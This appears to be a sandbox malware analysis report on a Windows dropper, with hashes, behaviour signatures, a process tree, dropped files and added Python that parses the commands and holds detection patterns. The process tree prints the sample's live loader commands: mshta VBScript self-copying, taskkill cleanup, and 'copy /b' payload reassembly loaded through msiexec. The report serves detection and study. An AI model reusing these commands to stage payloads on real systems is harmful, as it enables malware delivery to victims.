Analysis

  • max time kernel
    92s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    11-11-2024 09:28

General

  • Target

    setup_installer/Wed094c47c32b.exe

  • Size

    1.3MB

  • MD5

    b5cfd3a9dc9e645e24c79991bca60460

  • SHA1

    0d6bcdca2121d279bbe87c66cab515ac2478f555

  • SHA256

    852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768

  • SHA512

    55861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6

  • SSDEEP

    24576:4ny/f9u3poiauUTvKptPMfEd4tic/3wFzUm72uuQ2HrvcFM71J7d2SMpBcBuAKlm:BFpxuUTSMNtPgJUmiQ2H9jkSpceGU

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2304
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4228
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "" == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" ) do taskkill -f -im "%~nxL"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:948
        • C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
          XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3288
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF "" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2728
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF " == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" ) do taskkill -f -im "%~nxL"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3588
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" vbsCriPt: closE ( CrEaTeoBJecT ( "WsCRiPT.ShEll" ). RuN ( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ) )
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:5036
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:464
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4832
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2176
              • C:\Windows\SysWOW64\msiexec.exe
                msiexec.exe -y .\PEQQN6S.OU
                7⤵
                • Loads dropped DLL
                • Blocklisted process makes network request
                • System Location Discovery: System Language Discovery
                PID:5112
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill -f -im "Wed094c47c32b.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4460
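The process tree above records two cmd.exe one-liners that are worth being able to parse mechanically. The first (PIDs 948 and 3588) copies the running executable to a randomly named .exe with `type ... > X.exE`, relaunches it with an argument, and only runs `taskkill` against the original when the `IF "" == ""` gate is true, i.e. on the first launch without an argument (on the relaunch the comparison is `IF "/Pgxf5hQhM5tF " == ""`, which is false). The second (PID 464) writes the two bytes `MZ` with `echo | set /p`, prepends them to a header-stripped DLL that was dropped as two fragments (`copy /b`, cf. the 2B + 210KB + 1.4MB files under Downloads producing the 1.6MB `PEQQN6S.OU`), and loads the result with `msiexec -y`, which registers the module by calling its DllRegisterServer export. The following is an added example written for this report, not part of the sandbox output: it extracts the `copy /b` recipe from the recorded command line, replays the reassembly offline, and classifies the three recorded command lines against a few command-line patterns. The fragment contents are constructed stand-ins, and the pattern names are my own.

```python
"""Parse the cmd.exe one-liners from the process tree and replay the
payload reassembly offline.  Added example code, not sandbox output."""
import re

# Command lines copied verbatim from the process tree (PIDs 4228, 948, 464).
MSHTA_CMDLINE = (
    r'"C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). '
    r'Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" '
    r'> XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """" == """" '
    r'for %L IN (""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" ) '
    r'do taskkill -f -im ""%~nxL"" " ,0 , trUe) )'
)
SELF_COPY_CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" '
    r'> XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "" == "" '
    r'for %L IN ("C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" ) do taskkill -f -im "%~nxL"'
)
REASSEMBLY_CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & '
    r'cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou & '
    r'STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t'
)

# Constructed stand-ins for the dropped fragments (the real ones are 2 B, 210 KB and 1.4 MB).
# Keys are lower-cased because Windows file names are case-insensitive and the
# command lines spell the same names in several cases.
FRAGMENTS = {
    "osukt1.9t": b"MZ",                                 # header stub written by `set /p`
    "xrb2l6fd.ilf": b"\x90\x00\x03\x00" + b"A" * 60,    # DLL body with its first two bytes removed
    "9odf.6": b"B" * 100,                               # trailing chunk
}

# `copy [/switches] a + b + c out` clause, terminated by `&` or end of line.
COPY_RE = re.compile(
    r"\bcopy\b(?:\s+/[a-z])*\s+(?P<parts>[^&]+?)\s+(?P<out>\S+)\s*(?:&|$)", re.I
)


def parse_copy_recipe(cmdline):
    """Return (input fragments in order, output name) from a `copy /b` clause, or None."""
    m = COPY_RE.search(cmdline)
    if not m:
        return None
    parts = [p.strip().lower() for p in m.group("parts").split("+")]
    return parts, m.group("out").lower()


def reassemble(cmdline, fragments):
    """Concatenate fragments in recipe order, exactly as `copy /b` does; return (name, bytes)."""
    recipe = parse_copy_recipe(cmdline)
    if recipe is None:
        raise ValueError("no copy /b clause found")
    parts, out = recipe
    return out, b"".join(fragments[p] for p in parts)


def is_pe_candidate(blob):
    """True when the reassembled blob carries the DOS header magic the loader needs."""
    return blob[:2] == b"MZ"


# Command-line patterns (names are this example's own, not sandbox signatures).
SIGNS = [
    ("mshta-vbscript-launcher", re.compile(r"mshta\.exe.*vbscript:.*wscript\.shell", re.I)),
    ("self-copy-via-type-redirect", re.compile(r'\btype\b.*\.exe"*\s*>\s*\S+\.exe', re.I)),
    ("header-stripped-payload-reassembly", re.compile(r'set\s*/p\s*=\s*"?MZ"?.*\bcopy\b\s+/b', re.I)),
    ("msiexec-dll-register", re.compile(r"msiexec(?:\.exe)?\s+-y\s", re.I)),
    ("taskkill-self-cleanup", re.compile(r"taskkill\s+-f\s+-im", re.I)),
]


def classify(cmdline):
    """Return the names of every pattern that matches the command line, in SIGNS order."""
    return [name for name, rx in SIGNS if rx.search(cmdline)]


if __name__ == "__main__":
    name, blob = reassemble(REASSEMBLY_CMDLINE, FRAGMENTS)
    print(name, len(blob), "bytes, MZ header:", is_pe_candidate(blob))
    for line in (MSHTA_CMDLINE, SELF_COPY_CMDLINE, REASSEMBLY_CMDLINE):
        print(classify(line))
```

The `copy /b` parser is the part to reuse: given the recorded fragments from a sample's dropped-files list, it reproduces the loaded module byte for byte, which is what you need to hash and detonate `PEQQN6S.OU` when only the fragments were collected. The patterns are deliberately loose on case and spacing because every command line in this tree uses randomised casing to defeat exact-string matching.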

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\9Odf.6

    Filesize

    1.4MB

    MD5

    b259839b9455f04e8299f22cebe3274f

    SHA1

    30bbbc8d5089648c8c5425c23874976ba2e07b34

    SHA256

    edf7907b29f08e5788b6c611660348cce7cfaacb16bc484471aa06a1b9f8af89

    SHA512

    3de7e0e2d59a9bda837ca9bc5f0da15106ed045aaf28b0ad9ff6afb2a901f23747ace1373d9538692847f51cfbb22fa608e526cacce737c7e70b7482a643bb0d

  • C:\Users\Admin\AppData\Local\Temp\OsuKT1.9t

    Filesize

    2B

    MD5

    ac6ad5d9b99757c3a878f2d275ace198

    SHA1

    439baa1b33514fb81632aaf44d16a9378c5664fc

    SHA256

    9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d

    SHA512

    bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

  • C:\Users\Admin\AppData\Local\Temp\PEQQN6S.OU

    Filesize

    1.6MB

    MD5

    a2feb31d070b6920981b5461baa1ef81

    SHA1

    8b67bdb5e4a9e773c0ffade6545a3f292b2e7fd7

    SHA256

    ac7f2aaad9b9548136d48eb1e769d4339e958fb56fda2151f8637add5a77c950

    SHA512

    b82a3d898d1f328353c1911eff024f5b523f1d4fdf4dbdc914b2775d16590cce9c027e34b9c3f9681e9e09436dc345b4cff878b953c8525891736aeea1e14694

  • C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE

    Filesize

    1.3MB

    MD5

    b5cfd3a9dc9e645e24c79991bca60460

    SHA1

    0d6bcdca2121d279bbe87c66cab515ac2478f555

    SHA256

    852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768

    SHA512

    55861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6

  • C:\Users\Admin\AppData\Local\Temp\xrB2l6FD.ilF

    Filesize

    210KB

    MD5

    cd4352def1a81b4fe232eeb2c77dbc57

    SHA1

    9fb4f9a790efe3676915699bdc89ba0a06ce8210

    SHA256

    93589b9795d7547015734043f51c8d9a561857452eb91a52609a0be35bc3701c

    SHA512

    1b59d106cc324ad4c6f99358f6d9a6ec9c671ec8573c1f3084bf3d7f3c8f410691c9324b986d51cd89d5b0c48be95298a13a012ecbcfa379af906db25066656e

  • memory/5112-21-0x0000000002B10000-0x0000000002BAA000-memory.dmp

    Filesize

    616KB

  • memory/5112-17-0x0000000002A60000-0x0000000002B0F000-memory.dmp

    Filesize

    700KB

  • memory/5112-18-0x0000000002B10000-0x0000000002BAA000-memory.dmp

    Filesize

    616KB

  • memory/5112-16-0x00000000022F0000-0x0000000002488000-memory.dmp

    Filesize

    1.6MB

  • memory/5112-22-0x00000000022F0000-0x0000000002488000-memory.dmp

    Filesize

    1.6MB

  • memory/5112-24-0x0000000002B10000-0x0000000002BAA000-memory.dmp

    Filesize

    616KB

  • memory/5112-26-0x0000000004870000-0x0000000004904000-memory.dmp

    Filesize

    592KB

  • memory/5112-25-0x0000000002BB0000-0x000000000486D000-memory.dmp

    Filesize

    28.7MB

  • memory/5112-28-0x0000000004910000-0x000000000499F000-memory.dmp

    Filesize

    572KB

  • memory/5112-27-0x0000000004910000-0x000000000499F000-memory.dmp

    Filesize

    572KB

  • memory/5112-30-0x0000000004910000-0x000000000499F000-memory.dmp

    Filesize

    572KB

  • memory/5112-31-0x0000000000150000-0x0000000000151000-memory.dmp

    Filesize

    4KB

  • memory/5112-32-0x0000000000160000-0x0000000000164000-memory.dmp

    Filesize

    16KB